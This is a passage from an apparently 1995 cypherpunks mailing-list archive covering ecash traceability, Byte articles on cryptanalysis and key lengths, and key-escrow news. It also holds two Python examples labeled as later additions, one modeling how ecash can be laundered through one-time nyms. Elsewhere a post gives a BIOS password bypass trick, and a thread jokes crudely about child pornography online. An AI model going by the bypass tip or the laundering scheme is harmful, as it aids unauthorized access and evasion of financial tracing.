      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

-----END PGP SIGNATURE-----
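
[Added example, not part of Hal's or Bryce's messages: a toy Python model of the
linkage discussed above and of the one-time-nym re-withdrawal Bryce proposes.
Assumptions: a coin is modeled as a serial number plus the bank's RSA blind
signature, the bank simply logs who deposits each serial (a simplification of the
payment-transcript comparison Hal describes), and the Bank class, function names
and the tiny key are hypothetical.]

```python
import hashlib
import secrets
from math import gcd

# Toy bank key built from two Mersenne primes (constructed; far too small for real use).
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))        # bank's private exponent


def h(serial: str) -> int:
    """Map a coin serial number to the integer the bank signs."""
    return int.from_bytes(hashlib.sha256(serial.encode()).digest(), "big") % N


class Bank:
    def __init__(self):
        self.withdrawals = []   # (account, blinded value): all the bank sees at withdrawal
        self.spent = {}         # serial -> account that deposited it
        self.flagged = set()    # serials reported by a colluding payer

    def sign_blinded(self, account: str, blinded: int) -> int:
        self.withdrawals.append((account, blinded))
        return pow(blinded, D, N)

    def deposit(self, account: str, coin) -> bool:
        serial, sig = coin
        if pow(sig, E, N) != h(serial) or serial in self.spent:
            return False        # forged signature or coin already spent
        self.spent[serial] = account
        return True

    def trace(self, serial: str):
        """Account that deposited a flagged serial, or None if not flagged/deposited."""
        return self.spent.get(serial) if serial in self.flagged else None


def withdraw(bank: Bank, account: str):
    """Chaum blind signature: the bank signs h(serial) * r^E and never sees serial."""
    serial = secrets.token_hex(16)
    while True:
        r = secrets.randbelow(N - 2) + 2          # blinding factor, r >= 2
        if gcd(r, N) == 1:
            break
    blinded = (h(serial) * pow(r, E, N)) % N
    signed = bank.sign_blinded(account, blinded)
    sig = (signed * pow(r, -1, N)) % N            # unblind; r is discarded afterwards
    return serial, sig


def scenario(launder: bool) -> dict:
    bank = Bank()
    alice_coin = withdraw(bank, "Alice")
    bank.flagged.add(alice_coin[0])   # Alice colludes: reports the serial she paid with
    # Alice pays "CyberBob" over an anonymous channel; Bob now holds alice_coin.
    if launder:
        if not bank.deposit("Nym#2837004", alice_coin):
            raise RuntimeError("one-time nym deposit failed")
        final_coin = withdraw(bank, "Nym#2837004")   # fresh serial, fresh blinding
    else:
        final_coin = alice_coin
    ok = bank.deposit("NormalBob", final_coin)
    replay = bank.deposit("NormalBob", final_coin)   # same coin again: must be refused
    return {
        "deposit_ok": ok,
        "replay_ok": replay,
        "payment_traced_to": bank.trace(alice_coin[0]),
        "final_coin_flagged": final_coin[0] in bank.flagged,
        "bank_saw_final_coin_at_withdrawal":
            any(b == h(final_coin[0]) for _, b in bank.withdrawals),
    }


if __name__ == "__main__":
    print("direct deposit :", scenario(launder=False))
    print("via one-time nym:", scenario(launder=True))
```

[The model shows only the cryptographic linkage. Matching amounts and timing
between the nym's withdrawal and the later deposit are outside it, which is the
traffic-analysis caveat Bryce mentions.]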




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 15 Sep 95 21:51:32 PDT
To: wilcoxb@nagina.cs.colorado.edu
Subject: Re: Why ecash is traceable
Message-ID: <199509160450.WAA13662@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Re: ecash being non-traceable if anon accounts are allowed...
 
And if not, a market will probably develop to launder ecash.
 
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 15 Sep 95 21:52:18 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Bad sig from Cypherpunk auto-signer Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <199509150006.UAA17827@book.hks.net>
Message-ID: <199509160452.WAA27949@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hm.  Observe the bad signature from the "Cypherpunk signing agent".  Sorry if
I should have limited this to Lucky and the auto-signer, but I thought y'all
might be interested in this as either an attack or false positive.  (My bet
is on the false positive, of course.)


Bryce, signatures at end


P.S.  I have seen no kiddie porn of any type on the Net.  Oh wait, I saw some
once that advertised itself as "young girls" performing fellatio, but they
looked to be adults as far as I could tell.

P.P.S.  I wonder if a "pedaphile" would be a teacher fetishist?  And a
"pedephile"-- for feet?


- -----BEGIN PGP SIGNED MESSAGE-----

In article <9509141640.AA30602@zorch.w3.org>, hallam@w3.org wrote:


>We never used to see kiddie porn on the internet. The net would go balistic if a
>picture of a teen age nude was posted. Recently there has been a flood of hard
>core paedophile material.

There has always been nude teens on the net. The kind of pictures the most
casual observer can take at any Mediteranian beach at any given day in the
Summer. There is no real kiddy porn readily available on the net.  I
looked long and hard. Its a red herring.

ANYBODY on this list seen some real kiddy porn on the net? I am talking
intercourse, etc., not scans of six year olds from the Sears catalog, or
naked boys building sandcastles on the beach.

- - -- 
- - -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- - ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjDkioZzwIn1bdtAQEB0gF+M67Ih6WLAl8J9bxPZOBmyjxKsxUczpqv
th5x7ZuILyuf/+bFTtcLKwbOnzZkIfpJ
=pjLL
- -----END PGP SIGNATURE-----

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Sep 95 23:45:55 PDT
To: cypherpunks@toad.com
Subject: Re: laptop passwords
Message-ID: <199509160645.XAA29809@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 9/15/95 -0800, you wrote:
>I've got a dilemma.
>        2 laptops that I just purchased at a police auction have passwords,
>from what I can tell they are passworded at the cmos level. I would normally
>just pull out the battery and clear the cmos but these are laptops and I'm
>not too comfortable about doing that.  Any ideas?
>
>laptop1 -  Toshiba Satellite Pro T2400CT
>laptop2 -  Epson Action Note 500 c

I am not familiar with those models, but if they work like a regular AMI
bios, try hitting ctrl-alt-delete at the password prompt.  On many
passworded bios it will get you right past it.  That will at least give you
enough info to see if there is anything worth saving.  (I have no problem
giving out that trick since I have found most bios passwords pretty useless
unless used against the most clueless of users.)

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Sep 95 23:57:36 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <199509160657.XAA02345@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:28 PM 9/15/95 +5, you wrote:

>Another  way is to place the document in a PItA proprietary graphical
>format for transport and viewing only, stego identifier imbedded if
>you chose * , so that every portion of the document has some
>identifier imbedded in it. Many obvious and many devious. Electronic
>drawings with a harmless and useless circuit(s) added on , software
>with do nothing code (by design!:) ).  Difficult and time consuming
>to do, but for megabuck items, no prob. Automated for an additional
>fee of course. Start a service industry for such, make money, pay me
>back by running a fast, reliable remailer.

I seem to remember a software piracy case from a number of years back.  The
case was settled by Apple showing that their code had been copied by the
copyright "easteregg" hidden in the roms.  Made for a quick and effective
demonstration in court.  (The story may be apocryphal, but it makes for an
example as to how such things do have a (supposed) valid use in protecting
code from being snagged by  other companies.)

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 15 Sep 95 23:28:12 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: e$: Progress and Freedom Conference this Summer
In-Reply-To: <v02120d06ac79f1eb4cbd@[199.0.65.105]>
Message-ID: <199509160628.AAA02261@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Also check out Progress & Freedom Foundation's WWW site.  

http://www.pff.org/


This is Newt Gingrich's organization by the way in case anyone didn't know
that.


Bryce, signatures at end

 rah@shipwright.com (Robert Hettinga) wrote:
>
> There was a pointer here to an article in the NYT or WSJ about the
> conference this summer of the Progress and Freedom Foundation, with muchos
> net.luminarios (Huber, Myhrvold, Barlow, Brand, Kelly, Dyson, Keyworth,
> etc.) in attendance. Topics were mostly about e$ and the
> causes/consequences thereof.
> 
> I just saw this thing on CSPAN, and I thought it was way cool. Here's how
> to get it from CSPAN in case they don't run it again.
> 
> Ask for Tape number 57759-63
> CSPAN prices their tapes by the hour, at $35/hr. This tape is $105.00
> 
> 
> CSPAN
> Department 53
> Washington, DC 20055
> 
> In case I botched something above, or you want to put this on your favorite
> book-entry transaction account ;-), CSPAN's phone number is 202-737-3220



signatures follow:


                                    +                                        
      public key on keyservers      /.      island Life in a chaos sea       
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu    
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 15 Sep 95 21:57:41 PDT
To: cypherpunks@toad.com
Subject: Re: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID: <43dlf6$d07@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509160259.TAA03727@goblin.punk.net>,
Jeff Simmons  <jsimmons@goblin.punk.net> wrote:
>Could anyone point me to information on 'quantum' computing?

Try http://vesta.physics.ucla.edu/~smolin/index.html.

   - Ian "hoping this new mail2news gateway works in reverse as well"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Sat, 16 Sep 95 03:19:14 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive News - Win95 yes, Iomega zip drive no
Message-ID: <BRLiBD8w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

SecureDrive Users,

I have seen inquiries here and received direct e-mail enquiring about
SecureDrive and WIN95, and the Iomega zip disk.

I have recently heard from users that SecureDrive 1.3d does work on
Windows 95, although it does force it into "DOS Compatibility Mode",
which is a performance hit on disk access.  I've also heard that LOGIN
does not work from a WIN95 DOS window, so has to be issued outside of
Windows.

I haven't heard anything specific about SecureDrive 1.4, but I believe
it should work the same as 1.3d on WIN95.

I'm sorry to report that SecureDrive does not support the Iomega ZIP
drive.  I believe that's because the TSR driver supplied with the
hardware does not support a DiskBIOS interface.

I had thought that Secure Device, another real-time encryption system,
would support this drive, since it works through a device driver
mapped to a dos file.  But an actual trial proved otherwise.  The
problem is that the DOS file must be present when the CONFIG.SYS
DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
driver is a TSR that doesn't get loaded until after all DEVICE
statements have been processed.  There's no particular reason that
Iomega couldn't have written their driver as an MSDOS device driver
rather than a TSR, in which case SecureDevice would probably work, but
they didn't, so it doesn't.

Hope this info is helpful.  If any of you discover any interesting new
facts using SecureDrive, please let me know.

Edgar W. Swank   <edgar@HighNRG.sbay.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 15 Sep 95 18:07:38 PDT
To: cypherpunks@toad.com
Subject: Picking the Crypto Locks
Message-ID: <199509160107.DAA03893@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Byte, October, 1995, pp. 77, 80.


Picking the Crypto Locks

A new technique called differential cryptanalysis can
break even DES quickly

By Peter Wayner


How secure is your encrypted data? Advances in
mathematics and increased computing power mean you need
longer keys and stronger algorithms if you still want to
keep your secrets. Both private-key encryption (which
uses a single key for coding and decoding) and public-key
systems (which use separate keys for encryption and
decryption) are increasingly vulnerable to determined
attack. But do these weaknesses represent a real threat
to encrypted data, or are they still just intriguing
research results?

Unfortunately, when we try to assess the effectiveness of
today's popular cryptographic systems, we run into a
problem of mathematical ignorance. Most people who are
familiar with mathematics can work in two directions,
forward and backward, like the simple algebraic equation
a = b + 1. We can determine the value of the first
variable from that of the second and vice versa. Crypto
systems, however, generally rely on mathematics that
works only in one direction. People assume these systems
are secure because no one has yet shown how to work the
mathematics backward and break open the message. In
general, we determine the strength of most cryptographic
systems by seeing how well they avoid the attacks we know
have been used on other systems. If none of the past
attacks seems to work, then we deem a system secure. For
now.

Let's look at how today's codebreakers work, the
resources and time they need, and what we require in the
way of new systems and longer keys. Recent assessments of
the strength of private-key crypto systems involve
looking for theoretical holes and measuring the time
needed for a brute-force attack. Finding the holes can be
devilishly hard, calling for deep mathematical insights.
Brute-force attacks are easier to mount if enough
computational hardware is available, but they're also
easy to defend against.

The most important development in the realm of data
encryption in recent years is Eli Biham and Adi Shamir's
differential cryptanalysis. They showed how to mount a
limited attack on today's most widely used cryptosystem,
DES (the federal Data Encryption Standard), which is also
the basis for Unix's password system.

Imagine that you had access to your victim's DES cipher
"box" (the common term for an enciphering system) with
preloaded keys. Your goal is to determine the 56-bit key,
so that you can decrypt the other messages your victim
had encrypted with the box. Biham and Shamir showed that
you could infer the hidden key if you could pass 2^47
messages through the box and observe what came out. This
chosen plaintext attack builds up a statistical model of
the cipher, and it needs this many plaintexts to produce
an answer with confidence.

Most intriguing, this work exposed flaws in many DES
substitutes. Because the U.S. government classified the
details behind DES's design, many assumed that there
might be a trapdoor through which the government could
eavesdrop. To circumvent these potential trapdoors, some
folks designed their own variations of DES. Most of these
new ciphers, however, fall even faster to Biham and
Shamir's mathematical machinery. FEAL-4, a faster
replacement, for example, takes only four well-chosen
plaintexts.

_______________________________________________________

Strengths and Weakness of Crypto Algorithms
_______________________________________________________

Algorithm      Comment      Strengths     Weaknesses
_______________________________________________________

DES            Standard,    Long-tested   Has yielded
               Widely                     to DC
               Accepted
_______________________________________________________

FEAL-4         DES                        Easily broken
               substitute                 by DC
_______________________________________________________

GDES,          DES-like                   Easily broken
New DES                                   by DC
_______________________________________________________

Khufu          DES-like     Secure        New, unknown
                                          against DC
_______________________________________________________

Blowfish       DES-like     Secure        New, unknown
                                          against DC
_______________________________________________________

RC-4           Proprietary  Variable-     Unknown
                            length key
_______________________________________________________

RSA            Widely used  Long-tested   Vulnerable to
Public Key                                advances in
                                          factoring  
_______________________________________________________

Skipjack       Classified   Considered    Algorithm must
                            strong        remain secret
                                          to preserve
                                          law-enforcement
                                          trapdoor
_______________________________________________________

DC = differential cryptanalysis
_______________________________________________________


Recently, the IBM scientists who originally designed DES
revealed that they anticipated Biham and Shamir's attack
and optimized DES to resist it. Because other
nongovernment cryptographers didn't know about this
attack, they couldn't design their software to resist it.
Now the information is public, and there are new ciphers
that hold up well against these attacks. Ralph Merkle's
Khufu and Bruce Schneier's Blowfish are two private-key
ciphers that are similar to DES but resist differential
cryptography. They do this by creating new S-boxes for
each encryption, using the key to randomize them.
(S-boxes are the essential scrambling elements of
DES-like ciphers. Think of them as lookup tables or
nonlinear functions; their outputs should be as random as
possible.) Differential cryptanalysis works only if the
attacker knows what's in the S-boxes.

This work also revealed some stunning counterintuitive
results. Key length is usually taken as a rough measure
of a system's security. DES uses 56-bit keys; a
brute-force attacker might need to try all 2^56 keys to
find the right one. A longer key would mean a longer
brute-force attack. However, Biham and Shamir showed that
even if DES used longer keys, it would hardly be any
stronger against differential cryptanalysis. The
statistical model would still be solvable if DES used the
maximum of 768 bits.

Applying this knowledge to other types of ciphers is
tricky. RSA Data Security markets a proprietary algorithm
called RC-4 that accepts a variable-length key; this
algorithm is used in many products. The flexible key
length can be an advantage in some situations. For
example, the government allows general export of software
using RC-4 with a 40-bit key, but similar software using
a longer key must stay within the U.S. While we don't
know if differential cryptanalysis can be applied to RC-4
directly, because of the algorithm's proprietary nature,
the results with DES suggest that more key is not
necessarily stronger.

Men and Machines

Mathematical tools like differential cryptanalysis can be
the most powerful attack against a cipher system.
Brute-force attacks are normally a last resort, rare in
practice because cipher designers routinely use long key
lengths specifically to preclude them. But times are
changing. We're reaching a point at which a large machine
can quickly search the entire keyspace of DES. DES is
still in wide use; it's been the commercial and
governmental standard for nearly two decades. Replacing
such standards can be a painfully slow process.

DES users should be thinking about what can be done with
off-the-shelf hardware.

Brute-force attacks simply use large machines that try
all possible passwords in parallel. It's even possible to
produce native chips that run DES. Michael Wiener of Bell
Northern Research described how to build a $1 million
machine using a pipelined DES processor that could cruise
through all possible keys in about 7 hours.

Massively parallel machines can also attack the problem.
Some of the most promising emerging machines distribute
small, 1-bit processors directly onto the memory chips.
Some have 1024 processors on a chip with 42 bits of
memory per processor. (Before it entered Chapter 11, Cray
Computer was building for the National Security Agency a
special Cray 3 with such processor-embedded memory.) In
1992 I designed a machine using 1 million associative
processor memory chips (standard DRAM densities) from
Coherent Research (Syracuse, NY) that could attack all of
DES in one day. This machine could be reprogrammed to
attack other DES-like ciphers. Linden Technology (Austin,
TX) is currently exploring manufacturing new 4-Mb DRAMs
with the 1024 associative processors built onto the chip.

The effect of brute-force attacks on DES is also
important for Unix security, which stores each password
after passing it through DES 25 times. At log-in, you
type your password; it's encrypted 25 times and the
result compared against the password file. If it matches,
the system grants you access. Because the password file
doesn't contain the passwords themselves, unauthorized
users can't use the file to recover them directly. They
must use a brute-force machine. However, the brute-force
attack can be relatively successful against Unix, because
the keyspace is smaller. Most users limit their passwords
to alphabetic characters, occasionally adding numbers.
This makes searching for passwords much faster; it could
be done quite quickly with an associative-memory parallel
processor. One estimate suggests that a computer using
512 of Linden's chips could test all six-character
alphanumeric passwords in 15 minutes. Clearly, the Unix
password structure needs to be rethought in light of
today's machines and code-breaking techniques.

Because of this new vulnerability, you may want to
explore other, newer ciphers, such as Merkle's Khufu or
Schneier's Blowfish. The classified Skipjack algorithm
buried inside the U.S. government's Clipper and Capstone
encryption chips also uses S-boxes, but little is known
about their design. There's little reliable public
information about RSA Data Security's RC-4. Anyone who
uses these algorithms must be prepared to trust the wits
of the designers, because the algorithms have not
undergone the intensely thorough and long-time public
scrutiny given to DES.

Many organizations have opted to continue with DES, but
the current state of the art is triple-DES -- three
passes of the algorithm with either 112- or 168-bit keys.
This effectively guards against both brute-force and
differential analysis attacks. These users can rest
assured that, paradoxically, all the attacks focused on
DES continue to keep it strong.

-----

Peter Wayner is a BYTE consulting editor living in
Baltimore, MD. You can reach him on the Internet at
pcw@access.digex.net, on BIX as pwayner@bix.com, or on
the World Wide Web at http://access.digex.net/~pcw/
pcwpage.html.

-----


Byte, October, 1995, p. 78.


Factoring in Public-Key's Future

Long thought nearly unbreakable, public-key cryptography
is yielding to attack. The secret of security here is key
length.

By Bruce Schneier


Factoring large numbers is hard but not as hard as it
used to be. This has grave implications for the
effectiveness of public key cryptography, which relies on
the difficulty of factoring long keys for its security.
But how long is long enough?

In 1976, Richard Guy wrote: "I shall be surprised if
anyone regularly factors numbers of size 10^80 without
special form during the present century." In 1977, Ron
Rivest said that factoring a 125-digit number would take
40 quadrillion years. In 1994, a 129-digit number was
factored. The lesson here is that making predictions is
foolish.

Today, 512-bit keys are common. Factoring them, thus
destroying their security, is well within the range of
possibility for today's computing resources. A weekend-
long worm on the Internet could do it.

Computing power is measured in MIPS-years: a
million-instructions-per-second computer running for one
year, or about 3 x 10^13 instructions. A 100-MHz Pentium
is about a 50-MIPS machine; a 1600-node Intel Paragon is
about 50,000 MIPS.

In 1983, a Cray X-MP supercomputer factored a 71-digit
number in 0.1 MIPS-years, using 9.5 CPU hours. That's
expensive. Factoring the 129-digit number in 1994
required 5000 MIPS-years and used the idle time on 1600
computers around the world over an eight-month period.
Although it took longer, it was essentially free.

Those two computations used what's called the *quadratic
sieve*, but a newer, more powerful algorithm has arrived.
The *general number field sieve* is faster than the
quadratic sieve for numbers well below 116 digits and can
factor a 512-bit number over 10 times faster -- it would
take less than a year to run on an 1800-node Intel
Paragon.

And the process gets still faster. Mathematicians keep
coming up with new tricks, new optimizations, and new
techniques. A related algorithm, the special number field
sieve, can already factor numbers of a specialized form
(not generally used for cryptography) much faster. So we
can probably optimize the general number field sieve to
run that fast. For all we know, the National Security
Agency is already doing it.

The figure "MIPS Years Needed to Factor" gives the number
of MIPS-years required to factor "special" and "general"
numbers of different lengths.

How Big Is Big Enough?

The wise cryptographer is ultraconservative when choosing
key lengths for a public-key system. You must consider
the intended security, the key's expected lifetime, and
the current state of the factoring art. Now you need a
1024-bit number to get the same security you got from a
512-bit number in the early 1980s. If you want your keys
to remain secure for 20 years, 1024 bits is probably too
short.

Consider these assumptions from the mathematicians who
factored RSA-129: We believe we could acquire 100,000
machines without superhuman or unethical efforts and
without an Internet worm or virus. Many organizations
have several thousand machines on the Net. Using their
facilities would require diplomacy but should not be
impossible. Assuming an average power of 5 MIPS and one
year elapsed time, we could reasonably embark on a
project that would require half a million MIPS-years. The
project to factor the 129-digit number harnessed an
estimated 0.03 percent of the Internet's total computing
power. A well-publicized project might be able to harness
2 percent of the world's computing power for a year.

My recommendations for public-key lengths are given in
the figure "Recommended Public-Key Key Lengths" according
to how long you require the key to be secure. There are
three key lengths given for each period -- one secure
against an individual cryptanalyst who can get his hands
on 10,000 MIPS-years, one against a major corporation
that could harness 10^7 MIPS-years, and the third secure
against a major government and 10^9 MIPS-years. These
figures assume that computing power will increase by a
factor of 10 every five years and that mathematical
advances will let us factor numbers at the speeds of the
special number field sieve.

Not everyone will agree with these final recommendations.
The National Institute of Standards and Technology has
mandated 512- to 1024-bit keys for its Digital Signature
Standard. PGP has a maximum RSA key length of 1280 bits.
Arjen Lenstra, the world's most successful factorer,
refuses to predict beyond 10 years. There's always the
possibility that an advance in factoring will surprise me
as well, though I tried to factor everything into my
calculations. But why trust me? I just proved my own
foolishness by making predictions.

_______________________________________________________

MIPS Years Needed to Factor
_______________________________________________________

Ascending Line of General Number Field Sieve

Ascending Line Special Number Field Sieve

Y-axis: MIPS-years
10^0, 10^3, 10^6, 10^9, 10^12, 10^15, 10^18, 10^21

X-axis: Bits
512, 768, 1024, 1280, 1536, 2048
_______________________________________________________


_______________________________________________________

Recommended Public-Key Key Lengths
_______________________________________________________

Ascending bars for: Individual, Company, Government

Y-axis: Bits 0, 500, 1000, 1500, 2000, 2500

X-axis: Year 1995  2000  2005  2010  2015
_______________________________________________________

-----

Bruce Schneier is the author of Applied Cryptography
(John Wiley), the second edition of which is due out in
December. He can be reached on the Internet as
schneier@winternet.com, or on BIX c/o editors@bix.com.

-----
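
The key-length model described in the Schneier article above, as an added
example that is not part of the article or of the original post. It takes the
article's three attacker budgets, its tenfold growth in computing power every
five years, and its assumption that general numbers will fall at special
number field sieve speeds. The standard heuristic sieve running-time formula
and the calibration point (512 bits at 5 x 10^4 MIPS-years, read from "less
than a year" on a roughly 50,000-MIPS Paragon) are assumptions added here, so
the output illustrates the method and is not the article's figure.

```python
import math

# Attacker budgets in MIPS-years for 1995, as stated in the article.
BUDGETS_1995 = {"individual": 1e4, "corporation": 1e7, "government": 1e9}

# ASSUMPTION (added calibration, not taken from the article's figure):
# factoring a 512-bit general number with the general number field sieve
# costs about 5e4 MIPS-years.
CAL_BITS, CAL_MIPS_YEARS = 512, 5e4


def nfs_work(bits, special=False):
    """Heuristic number field sieve work factor L_n[1/3, c], o(1) term dropped.

    c = (64/9)^(1/3) for the general sieve, (32/9)^(1/3) for the special one.
    """
    ln_n = bits * math.log(2)
    c = (32 / 9 if special else 64 / 9) ** (1 / 3)
    return math.exp(c * ln_n ** (1 / 3) * math.log(ln_n) ** (2 / 3))


def mips_years(bits, special=False):
    """Estimated factoring cost in MIPS-years, scaled to the calibration point."""
    scale = CAL_MIPS_YEARS / nfs_work(CAL_BITS)
    return scale * nfs_work(bits, special)


def budget(attacker, year):
    """Attacker budget in MIPS-years, growing by a factor of 10 every five years."""
    return BUDGETS_1995[attacker] * 10 ** ((year - 1995) / 5)


def min_key_bits(attacker, year, step=64):
    """Smallest modulus size (multiple of `step`) whose factoring cost at
    special-sieve speed exceeds the attacker's budget in `year`, the last
    year the key has to stay secure."""
    bits = 512
    while mips_years(bits, special=True) <= budget(attacker, year):
        bits += step
    return bits


def table(years=(1995, 2000, 2005, 2010, 2015)):
    """Key length per year and attacker class, same axes as the article's figure."""
    return {y: {a: min_key_bits(a, y) for a in BUDGETS_1995} for y in years}


if __name__ == "__main__":
    print("year  " + "  ".join(f"{a:>11}" for a in BUDGETS_1995))
    for year, row in table().items():
        print(f"{year}  " + "  ".join(f"{row[a]:>11}" for a in BUDGETS_1995))
    ratio = mips_years(1024) / mips_years(512)
    print(f"1024-bit vs 512-bit general sieve cost: about {ratio:.1e} times")
```
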












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Sat, 16 Sep 95 07:12:56 PDT
To: rsalz@osf.org
Subject: Re:  "Use implies consent to monitoring"
Message-ID: <199509161407.HAA13837@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@osf.org>:
> >   Please be advised that use constitutes consent to monitoring
> 
> Use of what?

Obviously of something that can be monitored - as this is apparently
from the ECPA I would assume use of "electronic communications." Of course
I haven't verified that this quote is actually from the ECPA, that's
what the InterNIC claims it is.


----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Sat, 16 Sep 95 07:22:53 PDT
To: pfarrell@netcom.com
Subject: Wash Post coverage of NIST Key escrow-export
Message-ID: <199509161419.HAA23095@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Today's Washington Post has some coverage (finally) of the
encryption/key-escrow/FIPS standards issues. Headline is
Feuding again erupts over encryption exports

I typed in the text. url:
http://www.isse.gmu.edu/~pfarrell/nist/post.html

Pat
Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Sat, 16 Sep 95 04:41:39 PDT
To: Bruce Schneier <cypherpunks@toad.com
Subject: Web page
Message-ID: <v01530503ac8068056625@[204.91.138.80]>
MIME-Version: 1.0
Content-Type: text/plain


Hi Bruce, How's it going? I'm back from DK and the UK. I understand you're
just coming back from JP (wow what world travelers we are!).

have you heard from Sutherland? Do we have a title? page length? It seems
to me that we should take out some of the clipper stuff and put in more on
CKE since that's pretty hot at the moment and will further distinguish us
from Hoffman's book.

We have also moved up to 56kb FR here in the office. Are you still
interested in a home page here? Or do you have one we can link to?

Dave


David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * ftp/gopher/wais cpsr.org
Washington, DC 20003                  * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk> (by way ofrah@shipwright.com (Robert Hettinga))
Date: Sat, 16 Sep 95 04:44:57 PDT
To: cypherpunks@toad.com
Subject: More on ECheques
Message-ID: <v02120d00ac805e5cf474@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


1. I was not suggesting that you put your real bank account number
    in the program.  A test number is perfectly adequate.

2. In the UK people advertise their Bank Account numbers so that people
    can pay them.

3. If you do use your real bank account number,  I will not pay you
    anything nonetheless.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 16 Sep 95 05:30:14 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <PysiBD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


aba@dcs.exeter.ac.uk writes:
> One thing I have been thinking would be nice would be a USENET
> newsgroup, as mailing lists are a step away from easy access which
> some people never make.

This sounds like a very good idea to me, since I find the flood of
